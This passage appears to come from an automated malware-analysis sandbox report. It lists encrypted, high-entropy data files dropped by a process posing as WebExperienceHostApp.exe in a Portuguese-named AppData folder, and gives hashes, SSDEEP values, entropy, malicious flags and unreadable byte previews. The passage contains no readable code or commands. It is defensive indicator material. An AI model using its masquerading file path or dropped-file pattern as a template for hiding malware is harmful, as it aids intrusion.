                                                                  Size (bytes):8404
                                                                  Entropy (8bit):7.978169844008558
                                                                  Encrypted:false
                                                                  SSDEEP:192:IF0nPmdKIk/OAKGPfS+ppT6brkQxYZaKmvNflfD7mdmSHNiIdwUO9mEj:5+dKnOrGPfSopT3TmvNflfDyLTO99j
                                                                  MD5:40B175B73BA17213FC66C841611287FD
                                                                  SHA1:AD2BAF9F8C6A15085AA450BC8FF5BD3389C4BFAA
                                                                  SHA-256:50DBCCC08F41A0147AB2CC1E2E4DA1B7A1A95B50B7D641193714E37B2F286F32
                                                                  SHA-512:0996675ECC2D2B02F68885DF0330E8AC37CC9154E46405D54D3841749507B36D401ABA782988D1EFD805A24997AB6F2DD5D8D50044CB5AA1C881C5235AFAF60A
                                                                  Malicious:false
                                                                  Preview:....V.....1.r..zO.....m.v1.l4.>....4..........d...T..5..l...m...lN8.v=C.......]..?..+v)^.~.7.a..6...%.Qf.....[..^u.r.D.7.......j......}@&.v....M.Z....}6...Op.. $....@igD`Q.".in...4.>s..;.....i....{..........r.....G.V...>..=....0i..h....5.m.....;0.0=2.."n..l.....7..B..{.HU...-.A...:.G.....|.2....6.....9...?...*....%......'1.."..#x..36..0k..s..R.K!....].................s..}.....9H...w.[.. J..[... ...S"..._.f.......<X.;.w.y.}....{...O>.M.&ow...[.u...@S,..F-.....5......0......c...-..i.t...%.......,83...c.ad.....t..W|....w...._.......>.....6.....a...[j*l"......o....Z......q...Gz!n.'.\.Z6,.kdc>.......W...T.7.?. .Pe|`.i....`.E.R.j..7..`[.....8.p....04....;2Z.,.Q.f~/..T....7...1UD..k..DH....?3K...V..y.....k.....p.?O~....#..K./m7.S...,."...Q...(Xbp._#...`k_:KN..-.:......^Xcn.7..G..:...Q......F!TE.E.c....}pux.C..j..b...p..o.9.H.!...2...|=.*PL?.!..#.@.H..X........ii[@.....3...f.\....^...... =LKI7..p.1.....?......0....$....SA...y.70.p..$......M.
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):96884
                                                                  Entropy (8bit):7.998298845368549
                                                                  Encrypted:true
                                                                  SSDEEP:1536:1pGSEGGRz58GNaNft+tGlLxMwvFFoSr0ptR0d/iJnJQLz9HaOM:1pn/Gt58Geft+tGNCmFRdiJpOM
                                                                  MD5:149E13F368075782140E3E1D6DA50CBD
                                                                  SHA1:8779406F7BFC4ECE79A6F90CE2DD0B075A084C16
                                                                  SHA-256:7F6A9450C3A336173D30B97F9E530760262BE74BEF494D9CADB0D9849CC2DF88
                                                                  SHA-512:C477C8682934A27DC9E099DD015708CF34392977B5CE56C70F6ABBA8BD019093FF9C8D53BB9E5FA316D718154F9A3A4688149E0B12186549D51CB3A928F71529
                                                                  Malicious:true
                                                                  Preview:.!>...{.......4?W..E..+.<.V...7<@D.]....SM.7.Ez.T.G...q......z.)....L.\U..v=+_.....Z.l.bs?M..ea".Lwm...}..F.j.....F..E..K*..N...^..|.6.a.@K]N...Q......7.I'..>o....].(S...A..+%[..i.....M.x....[;.E.J..b..~..(_.........?H(D$....um.@[Mt..z...'g+wF'i.=...,......F.jx.V.qc.....K...)%O...|hCd.Ht...=.W......<;y>H..1.c....>t...qR..t.8A.-M.:..P.q.M."'.!.{..B.r..!Z*......_...b.f..0..E.>-......W....R...K..1.}.N...^wF}4|.H?............?8>..~0..r...t.......a\{.o?#:.S:o....E.a.>....O...oT.aU.....:I.Qv...n>.....m.G....I.....S5>X.a......C%&...&..x..f.+UD....`.....?...P..........&7.C6..2:.h......AX..v..7...`.?E..8A..|...g..6\...&......f....0.,T.Z..sU..B.[..}p.Y..&.l.D:.......>.....)-....m6[...k../J..1......../...>...J...-.w.%B...f..l}..2..9L;.N).T..D.y../u#}.....zF.`...}.U.'1af..."".....N..by..Q.....Y....X..L........P..im..O..lv...}....q._F3$....=.QB...-SS...x..N..*..x....8....s..M4.2.r.........."..{X..4.q...I-N.bO5+...'.T.Z.qj.Q.^T.8....I.T..7T..b}.....*.
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):30266
                                                                  Entropy (8bit):7.994046482138979
                                                                  Encrypted:true
                                                                  SSDEEP:768:3IDNXI5O2qKR8Jy0xs6551vHEM2pMg3sjqi9:3c5lKR8ZD5TvHEPm9
                                                                  MD5:4BC9390003135993497C35E68F293E72
                                                                  SHA1:D1A40B3E0D8EC6C7E4BAFDE2EB68FEA80815FFE8
                                                                  SHA-256:817E3100FD0C68830124638535BC55D07A7B013D405BF3E998B9CFEC1DE983CE
                                                                  SHA-512:24EA981EB3952FB0D2C1AA53A41DE8955671EAD95229045F1198E0AD2D8EB14EE555E50E70DC991331DD38E0C24611E7B91F32095450D0811C69FAF287E903BD
                                                                  Malicious:true
                                                                  Preview:.L..|@.........S.....s.L../.i.,elw..G....".X...H..........S,.Ia.h.k.....MTR......+...[Kb..k..cg.:........J..~.....Th.....x.._.>....#I.@.>b...&./...._.=..(....|...8#."....W..$....7L._l..x(+_rZ...Q...?z...8.....+.+.#+.....]-..........Q.22;..[`..N9......p...cK....G..N..[.,.D.c...l.O...........|M5.0.#y:...G......=K..~]m..y.}e.'.....(.$.k.5m.+...;7l.d..G$......m....mZ).X.%.......u...QX...9k.v..{.....z....F.V(|}HK.2`k...JVJ...7HP....P....r.*.Tf..}..x=.....*.....-$.?...wJ..}{~../.8G........~..u.YP.c..j.v..6qn......a...g7..m..h...w.r..|...:..vz^jp.1...vG..9..9.R.....e..>..S.....$C.}...s..i..63. j...#.t...7......9U.`.."...R.<{.\..'s..`...xRQcpk...x...J}.8...B).............Q^.C.U......v.B..1..m.d.]...:MG..."..$.Y.~N]..)l..HK.....e..2"kK{._....P..09....H...Y..i....:>0~.........jN`.G,.......]..`....{_..fM..}...).?..g.....bM..!.1.@..........?.nK..~....7..{...h....m..Q.,.`...&. .30....M.G"........w..}.r..KO.t.q.........L....;X...
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):50153
                                                                  Entropy (8bit):7.996108103884875
                                                                  Encrypted:true
                                                                  SSDEEP:768:Q9B9iK7f1ZxocOwYOXzKCAFaTrhkn4gZ4Cm2soKVibTFagIKjCagea:a9iKD1vot8XLBhi3ZKFibxrpI7
                                                                  MD5:33B7F5B8E0ED698E32D0E594D9114F0F
                                                                  SHA1:4E85F72F715764F51C623FBC85894467F9FA57BD
                                                                  SHA-256:1572B0C05ACCE85F830727C44B6EF6634A3DCC3817406F9A59C732A3D22A9F98
                                                                  SHA-512:3EDE5E0EF097E05DBAA0F5B115DBDFB333960EBC83BEF10F97AE8C870C05FA172F71E61FD16F0212F01B4D08BE0F4979A57F1D4428718CF94DF918B8BABC02BE
                                                                  Malicious:true
                                                                  Preview:..GQ.T.Qu.6.u....{...e..u[.!....4.......;E...f...6.......}.%.xF....u. .Mm..$]..L...S...<...\P..d)...Y},.:8.A,....Q...vL%.X<...8.s.*U.5x.eao.B.#.a+.QD]).<...Eq.c{...]0.q.F.p....TfjOO..=..i....,.H.=..gF..:.I...|............3...o.@3....M...".b..v....~....j.d .!...1..UE..1....!.7.0~.t.[N/.,..8<m].E..,.N.u.hK}x..rAx.<p9.9...d.......&>u.=....[.....O..F{.....b=.......{.w.=.%N..ck@V_..|l.d/.eJ+7/8.....U.B..3.JK...O\,.U.~BR.+.L.......Ga.........1.E.F_...1r.H.0.E.K.s.B.,..J............].!F.o.....6...oy#3.`I... .,z.c.#.O.*....}..S,.ip.*h$%...v~z......@s.K.2...h"d..9.:g.....Y+.1W..)L.<4!.(.[E8x.w9...:...L....\..rj..<..W...1E.]m;S-W......5.....;.....i..@..N...T.C..1...T.f.........|...;.!}PV...1... u...p.D.|........0}._.,P.e.......,.El....!\..?...~$U....iL.._q]...04'N.\..[0.u.].....<.e...qCd........R..m%'.?.)U...m...u.....Q%.lrm..]..B....E..=...^Yq+........?...b..,1....@.{..IN...L....../L...H...Df.r........!i.=1T......5^.......d.q......@......
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):159430
                                                                  Entropy (8bit):7.998674900992916
                                                                  Encrypted:true
                                                                  SSDEEP:3072:67nd8ai/g9PNcK4iz+Aoe1YEKphabflcMGv9XmAoPsD/hVtNPEdHwnWwmr:qQ/waKBapuYEGEBHGv9r5/PtNPoQnWwy
                                                                  MD5:D2FFF6AF06A171F2F1C6276F28194969
                                                                  SHA1:96F62CAFAA6F1AED8C9D52FC45AD450671D387CF
                                                                  SHA-256:8C66468BFEA7DA7137B617D5FC554993F1D2170C81FC749359457DD4035545DB
                                                                  SHA-512:F4CC51E16F511423CF0B3D3995D4537F477E28A6985B1E34133088FB30A4A123379DE103C2C7344EF7776505D6EF27462E592A0D8741D98346E4DEF46E104228
                                                                  Malicious:true
                                                                  Preview:=H.BG<r..........V>+.zr.n......=.A..H"1....J.C.:..8w.d.G..a..w.YB.}.,'..bc..T%6.Fl.G*,......w.L'rV.3. .+S..[....\..jWG..t.....d#9......b..Tq;...(....[:.!x.{..9..w.t.....5..........X....U...,FBW.*...W`.....Qb@.E.?<....Ms.".-..!w...*..V.To.....?E..E..Ys....,].....bZ.]Y.?.x..xy..by?yhS.^..~2..IS..'....o....#L.LJ5...'.l. &..g.PJ....4..ye.:..-ZF..)....r...PV/...wD..*.:.`...xC........#..%..t.....j....^.$_..j..z....0.@?.6.v.h....5d...1.n.K....UB...T........@..(6...,cH... ..Y.4.....U2..-.T...A..].&..h U>/.W:.j1R..:....A..qz...........X].S.....y.'9.F.u.....P(f"..!........"X....\....hS7.....Y..s,..M.UU'......UA..$.oUo....H..+...g..vDA.`.I-.....=.EG..s.....}C/..`E.....3M."p...o.......x+. ........5...z......,K..>...RX......S{..*uX9b.`....Q.x......5..`.....N..!s#..IO..xf.H\.Q.Y....k.\.NK...M..J.&E..XD/..a mv...8.B3.F..-.x(.u...j....nW.N...(.PM...g..3]...8RQ...g..... \..._.=...8D.q.[.[.OiE@tY'....*.c%!..N:.....g....\S....9.s....v.....Y{}.;......}m..=.I
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):94418
                                                                  Entropy (8bit):7.997798184782707
                                                                  Encrypted:true
                                                                  SSDEEP:1536:mDAghOmFuBOh88Kw7EnH6VFmCDDIKCzfjR4XgL0Eu7A94DjQPIqPBLc19w5q8:mDAxLBOh8DdanmCDkKCzfjeXUe704Dje
                                                                  MD5:246BB6C39970DDB52E37F5FF55CD456A
                                                                  SHA1:D5AC3DC2E68A79339B35656D2067B238F2CC58BC
                                                                  SHA-256:BF91AA95EFD728F7F52704C21DBA03AD0E74566596EFFCFB540082E9EA29B811
                                                                  SHA-512:F5C72BA579A52B1709325C88FE4486AC15CD53475D2FD68E829D52C7524546AEF5F627DF7650E364D9AC2E3088CB79F4372F315BB5EF15E7D7240AC220CB7FDD
                                                                  Malicious:true
                                                                  Preview:...d/.n..\.C...`..I.x%[tt.f.r.y#x8b.m.z.E..+T..j.X.@,..I.......QC......V..e..|V.4n..-....4...5..\x..#.5 nU'?.;Y..u......*.b.2m.d....{...e...g...........&...].}.a...Id. ....8.K...U..`.b.....g..HM..O..~...V....3........7...<0...|%D.0.1.t......._I.%Y..N..nL........Yz...6...F..=...1.x.b..0T.QM.*.+..v..L.%l..7..tn...7..E..d..q......t.p.u03.t....q..2..M..}.*.$.&.!.....|..z"7[...I.......k.Qk)............q..*...C...'2}.......7.H....Q?..ZPg%)mK...9...o...+4....'..D..?.:u...@..7?..........Q)...RV.Zs....{........w..M....f5..8g.v......I......,.5 ..w*.g.<>7_q..'.+..!..V.......*=....n..}.k.%.`.d..c..1..R.$.&..3.7...|..J$'.\....X.....{..`qN.....*....$..4...Y..e.V.A....Q...WHo......G?...O.a. _A....k.-.....@-.>.: Z..M.v.tF.^..y...F.#.N+@.J...<.F[s..ak..MEd..(.....M.G.>.......G{.r&...?.........L&"......U.<|1.....[kh...:? J.o........)...1.OS...-.&Y...-ep.....q..X.&P.......S.@.....d...*So..F.uq=.HT...J.t....a....=.....o...*.......r..Y.\{.E.9.z^......
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):96208
                                                                  Entropy (8bit):7.997915607079107
                                                                  Encrypted:true
                                                                  SSDEEP:1536:Xgm8H4M0ME5sPUM/JUYK5NeDVQozeD188b1eOeoFDlKfT8ZSN3EU2Wx3:wBbBnxwgVQozPDMW8INUU2W1
                                                                  MD5:123FB8F30949590BBFB7C7B84E9DE627
                                                                  SHA1:9A006D3731EADA372636B29FBAB6D420FCF03482
                                                                  SHA-256:EA96BFD53FEFF54E9F6B6C2F70F0967DE1BBD6D246055E66DFF0793DD29BAB1F
                                                                  SHA-512:40A25D3798C213CA452788560D9B736219A1B9C9098393283C22847ED56391D7785E9C75022D9DC0462FDBE139E75C36687B0ABCE15B28C8B5D44B577EE60401
                                                                  Malicious:true
                                                                  Preview:Z.uW_...u..#\.`V..8u..E......N...|...u!7..%p......5.>.<."m.....h...C.rh..K-........c...C}...4I.'^..AW..?....h`...H...*..R..}....c....~+.3x.....b..D(....G.......<E..ul$f..cn.....g..#..E~.n../.>.[........mkg.9.E....N...B...F..O..II)..t.D.....2..DO..:.&.u......gfH.....X.(.M..t.m~*....hS....ZB.{.....B...%..`.=T......_.Q..F.j..C$..9y.0..L...........2l~..jA...OC.qpGd..T....K\......HI.........=...@.*.Z..'Hk..l?]....*.u<.P....B%...:... |.r.dk..r.3[D..Jx.p.......6.K..mT..H..{>.O.B.w@-G*... ....%fk.....G..9*.z.......E..$.lz..h...A.EL...G..W..~..P..<Y%.Jxt...{.:..z;~...1.02....o.m/...%.A...(#.V.}B....2.Z6........G..E/..Dw......%FX.. 11'....~.L..m...B.0.a.(...t&o.Sx..^..;h#u.;.OtC.]./V....I.7;O.n=..8?..M..T.[..Ww.O.......c7.`...E.e.R.a...]ZQ.m......W..G.T.37|G.kc...Z..D.TX...'.T...v........%.u....F..19..=x.V8_?..$...V...........nM..\..]Z...`...u.=...)}....>.].OM...JS..A.<..D.N..u..*(@..`I.)..Z.o.s.{I5...[...y....z..a......QQ.m
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):33415
                                                                  Entropy (8bit):7.994204014731013
                                                                  Encrypted:true
                                                                  SSDEEP:768:MTLFPNOvGH00iutaENLfJSVwl7yt4HypFxKsRJfdDzM:MTLFPo7u1Nws+/p5RxdDo
                                                                  MD5:AF4BB56B8867BBC361CC749FEF37AA0D
                                                                  SHA1:0E840EAF14CDD907AD26420655717B7A92EBE735
                                                                  SHA-256:17C1A997EC99FA547AF76966DBE4A90CA7939D0E02F068E7E30F842FC046404C
                                                                  SHA-512:EBE0510A5A89EA6F97305A4C6C67C2EE136480D6635350B4C61782352AB354BBEE4C0E10E31ADDCF10E51C4A0001ECCD2E2DCF2B7D23D50AB715FF8B9AA6151B
                                                                  Malicious:true
                                                                  Preview:...X'G..G.......t.....1..h...%.b.....'....-...b...)0..F...S..h...aBh.g[...,jPZHlc#.......F.7Ir.=....[..{..G.....|.)..FU....M.........BG.| .. {9o.qt.hM".<.....p,..(2.j\..7....B.[.?&..zu.......}_...p8...2.-..v...8eVp...@........~`..@.Z.Y....M..o....X.R...M.-..~..R.....=.....~.r.B?8..@.i..S..RW..g.hz2h*.6..4Hj.......i.{...`....q.m..G...._..9.....'.>.;X..eu...m...L.@_....zu..w..d0.....4...'..d>.S.?...Z..&K.,.i......C.I.)y>^...!uqi.!l)..@.C/.E`.D..UZ.SYI....Zk..5 z.3.....).EMx..x.@.....P.w...-._l.;h2}.lk[..>..N_.'..LQ....m..ks....W8.........~.'.m../.f.r:.$u.r...uf)A.....\9Q..Y..X......J...........N..<..l...5..%6>S:...p..V......*...A.4..d. ..[..b.......:kb*F.L.Z9..a...8..po..:..8.q2.5.&b.#x.CSW.+. qY..l..X...3.......)...@C.lU]...Tz..P.kw%..`s....=4x$Q.|.<..s........L..'.....J...P.Z..J?..'B>S.r.O.........6U<..O/.....?.k8.W~....*'".o........ ..Q.k...1...\;vG...|BP..:......3..s..._Ia%L..1.{..^.1|.+..W}w.......`l...)(%..^..$...........$d9..w.P,.,t
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):84571
                                                                  Entropy (8bit):7.997608030604283
                                                                  Encrypted:true
                                                                  SSDEEP:1536:RbyvD7uQ4jQIvcsn8n33vWMclNTyyKv3AiSWnqhnwLZXSKomDL6UwwiqS929Aw:9yPaj3nZNl5KvzjnwnwLZXSKoS+jqSQB
                                                                  MD5:1807001C5F0279DA5ABC482CF0F656A4
                                                                  SHA1:5D4A2CF0DC4B0C2A2522C7742B7C96DB6CB76929
                                                                  SHA-256:0BDFBF7449A6207CAEFAE9879AD579D195000D9AC535D43F0B6730C869B07473
                                                                  SHA-512:93D08CEEE3C7FF2606ED4040D577AF373D219CDCF4FBEF8864441253D971ADCE4D4ADF4A7683C16A33D3DD843AF7A3AB75842343C2361C7E8E6D3DEEF06D91AF
                                                                  Malicious:true
                                                                  Preview:t}.u.E)..'.:."#I....( kC...+......[...+......k.>.....d...w...v.Gx.u...A...D..".........CH...../.Rs.bz<.r.\...$4HY%.W..s..I.............J.....&.O.'..<.....\.^.[..5....A...8..;...{...5.nI..}...I........nC.M.V....K8.q`...>8.Tk.......Oy.YM?...........J....~.{....._..I....q..G....d*.6.O..p...[..NOD............)?.J..K..X..l%.='!..Zc)....p.._DE...<......H5.....zj8,_...C.Te_*-6.V..sto-....XN^..A....f..U.a2.~......(&..I.6.D..h....$....X.q*q......]Ws....L.C\......r.k.....?.../..g.9...{.=...M..3.%.&.a3..JJ....B..*..Y..t..........j.G.M2..........TF._s....B....IKI...k3l8K..X..........A.w..... .#Q....v.@.......&CK....@3.r...2.....m...v}..YWQ.%.c.@P.y.6'....+%a.1.y....e...k.5.2&l.+c.`..'.C.2........f.S.HKr..f.8n%E>.....)......P...4.3Bs.?.D..`...KT.d.sQ...f[.....^......rj.J0=.qr........b..$....."}....sY.z...9k.....]o.|.....N.~.g...M=.1..SC....}[..q{&....S9..l]..........!.~..A..>.-.:A....Cnf.fN.\..\..K.>%-......83.Ge.?..@.\.."..*$....^.K`..7..A..v......
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):27600
                                                                  Entropy (8bit):7.9941388261049005
                                                                  Encrypted:true
                                                                  SSDEEP:768:un8Rt9T7KMJPmDMhBmuTWZHsCv+OUmy7Wy23vwJB4I:vpBUYhBmuSKCvuFCyPJBL
                                                                  MD5:497F07BEC30357EE2256AD488799F2B9
                                                                  SHA1:6FF4C0CB541E40CC38900737770BF176901E70CD
                                                                  SHA-256:387FAD25299AE2DA33C5D0AC47C4EFF388A0591693996AEED2610407F6B1B9DB
                                                                  SHA-512:749916379365AF5AC6E0FC3F560EC5879986EEF29B2E0947BCC2A69D575BB950CDCC93F35D7FD4A7DF180C848925DD6067701A6EF5BEAB4CDC63D44F1C05EFDA
                                                                  Malicious:true
                                                                  Preview:e...6..7. ...L.u.O...0.Q..0!..O.z......[,.-S_..]..2AXf]..gE.SeF:R....ji.... .............l...s.........Myp.e]...j..z:...Y...P..;S,.8h|B/._-&5>B..d.3]...k..y..D...........F.S..T&/..U.../Q.\)..../..R..1Rs.......K5SS.QR...y.8../|~Tn$j.....z....r.|.....L..`o@.(.e.D...9.;.(.$w.O.3...N...L.........u. X..$.A....}.....0O.._d!.2..I.^.b:~.qJu.`.E.Nv..4nI-...!..#..fc..b?..i.Me.rE.h...0..+.`...]...]4.`.W..r.S-.t<..+:.......:?Wv...0.....(.r......g.K....../..*.{......g.....$......s^.Q6N...... \e.M.3....R(.T.....,.>.ZZ.n>.,.s.A.4d.s..%.o......y.%T.'..3f$x^yC..17....=...Yp.....7O.x.n.. .,...w....!Z.....>Z.8....).Te.#Xnl..i.|....+j..P.`p.Y....q......A.?.....E......1V....z..3..G.XouV..Y......$.F.?c....L?U...'..)...N....R1.%....}..V..`..z.d..0....6.#.5..Lwz.3..>..P..L7._.$C(w....-.W...i.b.*....c.;O.......'....@.).p..._.....u.YL6.k/.-.{.<Nf.p.ij..m.<O!u."..!zj.[..P..f?...C&tbM..i..}.$KG../t6...6...?....j.x..K.6.=.]O.-...X.4..~.}..|./._<.....L.HUvXU.8....^..
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):99619
                                                                  Entropy (8bit):7.998358713854593
                                                                  Encrypted:true
                                                                  SSDEEP:1536:m9ObUyqUwE/q9HJXFhWhGNWr4n/ylyFGjXuzYnN9bzjuW2/nZHepyNxq6ZdEiV:wWUSq9HHh0GYHlyAXuyN9bzju8QxFdJV
                                                                  MD5:E6181E6EBB5F37D2442A12C5CDCB3BD8
                                                                  SHA1:411FD337139EA9A90860C4364699B239C2064D71
                                                                  SHA-256:22C5836D7EA401BCF86D1DE32ADE4E3981EEB9FF9FEF74F9212F82AAF9B4FCD2
                                                                  SHA-512:DAF528A41241A46D377F30A24C1895A934BFC2FB4C11CDF431D274A485A5633FF0FBA2A733C59C84920E841B932DE19F9D53D4EC810E1511248D705BAF6AE4D9
                                                                  Malicious:true
                                                                  Preview:@...s#.....).^F..h9..:..C>...+..GZ...........nh...(..8.....G.".. . ...z...Rq..}...Lj.E..p.....A.....e7..U.|.\.n....I|. ..$&.pw.....5..T....ck....@.(....'....8..}..Y......_FY....4....v..8q..rt.N.U..f...X!a.g/q6X.vt.,.".,.L.0.a.^[...]I..!.P.P..5...I..Bod....~...7..-..._v..X..+...}.......(.z.&.%,.....R..pj.+....'xS....K...F~.}..0.P..a...1..V..c..(C.......M...T..4..&.O.^.....#.rv..3.p.S......t..n]...K~^..j...1..~..S9.;.."....s#'.gl.....I.Y.)..j.1.3..#...O.l.t.....])k.ID7..0]...|6|.q.#n.&...V....jp....6..^..}'.K.)....2..S.Kop@..\2...E.OW.j...........!#...G|{./...}../|....7..i/..Y.5...u.uTe3..8tn.....G.&.F.u.y.w.O..@.W=.ZO0|..X...1. ./ms...y.v..Mu..Ew....X...u.......T`..............*...c.^w+h`... P..............cw..?.I..!......g..].T...._m.if6$.D...{...L.06...Y.^."LUo...v...%%w.).+.0Q._@..WM`....1..&\...V..I/}&.C.:..Z.:.Q...X..d...|....}.....a.>R.r]......O...]K.6.{.HV.Z...ix.....qw6..>.....2_.0..QJ.{..e..Jf|.-*..... .,a......B~..x..E.......
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):36372
                                                                  Entropy (8bit):7.994711549739878
                                                                  Encrypted:true
                                                                  SSDEEP:768:K7uBZMznaY5ZGCDJ08STw5JNifGXnkhNCXi8Sc863ApF1SqMoxhCKW:IuBizaYfTJ08nfNEakT8SO3WHzW
                                                                  MD5:82F7C75D1D24AA85AA82075203F86CC2
                                                                  SHA1:ADEA7C7C9F7481108DFEFB9743916B8703D39965
                                                                  SHA-256:A6DD00F5B60E7A2772FE12C8A2439473C70744441B750A9486D8B1652945D0C8
                                                                  SHA-512:1CF1E0316D055CA51C03FA4FE39B3E454FA88B4BB48935AE9DBA59FF491789B1827DBF0FDC80EFB2DDB3D93237134F347CA7A9D498BF9E3AF0E6FD510FE6C1DE
                                                                  Malicious:true
                                                                  Preview:A........&o.#.Qm..}.J}..~=v..l.C...........{......}..Ku..B......9h.P...rI....^`............]...^.OFc.X`.-..G.......p9.n.......{_..rT....T&.....S/....`73)uk%.!.._i..\.......v...Q...^.I..@..9....;...;..lw....4x.b..{x8.|`....{t.kh..'.bj.fu......z.SHU.h?Q.|4Ol..cAV.........^P.\..G...rB.".=l...............\s..7Bx.w...Z./...m9/....y.@..y&mr.K...v.v.....m...5.w8$.....Dz...k.C...:...mp.v..d...`..C.._A.x..$8.Lv.G.5;......F.c..l.....z@.opE.../..J..M.Lk.u$=.O.9k..........{.....=...c.^.6<...;.8`....E.....9.....})K...l..$.z.\.BX{..`..qMY[..7.4...yM.b.......S}....Bm.|..0.rX..g.v$a...$m......c?....l....=,..... 74..S..-S.0shF.l.....ClWp.6.1K.......%.h....h.=p..@.a.;...+XZ....6.L..,.`.k_.9.x.@.7...Ju...^].t.A..Z...w...'.j..Y(.3%n..'s....U.%..\.g....|]..0'...Q.?Q[.H.)$.....pF.rO..:.u9{~J.]P$hr..i...(.._....@.....:.".^X.S;....-o...eE6*..G....#....g.. ....'.....^*.m..+.........%....."4....H~....1.....CS.Jy.g....|.RH..p..f.2ck>...;.CW..d..M...'.F.\.`...p..R.
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):91528
                                                                  Entropy (8bit):7.997809403253262
                                                                  Encrypted:true
                                                                  SSDEEP:1536:TM2TyiKbNoW7T2wAblzMd868hzKqKw26vcf7eLMsyVOkWFkXlvDq+YQ:TxTy31T3Av68hzK974cjeCOknlb9YQ
                                                                  MD5:7895F5E9AA9FFEB607995F095530E06A
                                                                  SHA1:7CA6D5A406845675451F70182B31FC5B33689D2A
                                                                  SHA-256:6014F2516653259DD44429382CBC0171E594697792F0FD9AB495859167C83AF7
                                                                  SHA-512:F8F47EB24C1BFC00F8D2F91A4EA1052F343AE9804498428F8368F2F0BB851B3EB6E8C73D19A3ACF75E255803C21C9D413FF5CBBF74165A81E12F18835E6891EE
                                                                  Malicious:true
                                                                  Preview:..E.-.^#>.....C..../.J..)....l)..X.....r.~.."YQ.d.#."....>v..'u..E";.N..`.....`.k..Q..3..L.U.P2/,..l.Tm.1V,..$..C..s...z.....f.L.Gx.q.5...f.k......"...J.p........\..$..=.)+....J4.*|`.+6.............1....|p.......}5...^..G.)...W.W..dZ...i.:M..fx..y4.7..*.@..R<:.m...q...[M.Z.z.q;.W..?.5....?.CS.<._..j.L.=]..ZF;..X.....)va.L<9eI....r..b5.S.gh..vh.s!..g...Z.>y&....v..pf.$.O.._z',L.E2@J}.6...;.z.C.r...z.e.K...@.....a..9My.....y...1....g.,.C...^..o.@..*...T+..t+C.~w.i.......xw#.0....Y.....'.^.....~?.9^J.\._3n8q.wn..k..4..BYo.j.......E.u.k..$../k.@..L...........@...)FiIy........k..(h.Z.......H.1`.z.<.[..S.. ...`e..t...x...at._Q.e.%..k..Z.|....C$Z<.-B.N.w/..a...i......S.kX..?.Z...&..@.W.5S.....2.G.yM..@.%K9.....OB.>2=..).-@..r...,...p!.>........M'...`..C.W.%.X.V.....+*.yz...z....V5...Sk.......1D........5.=....3.(~".3..G2......X.m..+...iC0H.%C..p$..=..........|a....B.j^.\}....2...:m.u.x....;...P$.}....f..0a...[.......k.g....N~3...+..:.x.v....../%(..W"....O..:+A.f
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):43413
                                                                  Entropy (8bit):7.995732888617455
                                                                  Encrypted:true
                                                                  SSDEEP:768:t1e+mn6GYHpdNPZYVcGKHqbwGah9eON3mfx+GqEZ9hsn9EUPo+:tQ+mnUwcGKTJh9Rwjm9EUA+
                                                                  MD5:825C6BC8D255C8ABCCDFFFE0AA79B82F
                                                                  SHA1:FE2134078B7D5A07EC1C4D0476E0AAA5C40D39D2
                                                                  SHA-256:247D839FADCFAD2D0275411407C4E4F49197122CD7DF6206D584896A06B84104
                                                                  SHA-512:E29C18B8CA02A67D55E70C2100CDACB495CE35F295BDEC73EF45137032528EBF8127D6214CBF3E039DBA43CCB58A0B0E3E2A283C74A7DEC9A7F128768E58E603
                                                                  Malicious:true
